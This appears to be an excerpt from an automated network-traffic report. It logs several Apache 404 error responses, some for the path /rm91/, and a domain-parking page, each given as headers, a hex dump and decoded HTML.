Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 12 Aug 2024 03:13:54 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:04 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:07 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:09 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:22:12 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:15:42 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:15:44 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:15:47 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:15:49 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 03:15:56 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 